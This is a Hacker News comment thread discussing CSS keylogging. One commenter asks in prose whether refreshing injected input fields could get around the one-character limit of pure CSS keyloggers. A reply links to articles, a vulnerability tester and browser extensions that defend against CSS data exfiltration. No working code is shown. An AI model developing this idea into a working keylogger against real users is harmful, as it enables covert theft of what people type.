Hacker News new | past | comments | ask | show | jobs | submit login

Following the link in your readme to davywtf's twitter post, I saw this comment by dade:

>I remember last year, and probably the year before that, and probably the year before that still, people continually rediscover CSS keylogging. Glad to see something more interesting this time. Good work.

Following up on this, I found an article[0] claiming that it isn't really an issue since a pure CSS keylogger can only catch one character. It seems to me like your method of pseudo-refreshing the page by making old elements hidden and delivering new elements to replace them might be able to overcome this impediment, which would make your on-screen keyboard unnecessary; if I understand correctly, you could just keep capturing whatever the user types in a field, and deliver a new field that already has whatever they've typed already as the default value with autofocus on. Do I understand correctly? Is there something I'm missing, like autofocus not playing well with continuous chunks of data being delivered? I'm not saying you should put in the additional effort to do this for your beautiful-horrible-clusterfuck of a project, I'm just curious about the feasibility and thought you might already know the answer.

[0]: https://www.bram.us/2018/02/21/css-keylogger-and-why-you-sho...




> Following up on this, I found an article[0] claiming that it isn't really an issue since a pure CSS keylogger can only catch one character.

That reminds me of:

• Stealing Data With CSS: Attack and Defense https://www.mike-gualtieri.com/posts/stealing-data-with-css-...

• CSS Exfil Vulnerability Tester https://www.mike-gualtieri.com/css-exfil-vulnerability-teste...

• CSS Exfil Protection (Firefox) https://addons.mozilla.org/en-US/firefox/addon/css-exfil-pro...

• CSS Exfil Protection (Chrome) https://chrome.google.com/webstore/detail/css-exfil-protecti...

Never really got much coverage. It's not mitigated by uBlock or uMatrix (unless you deny all CSS).




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: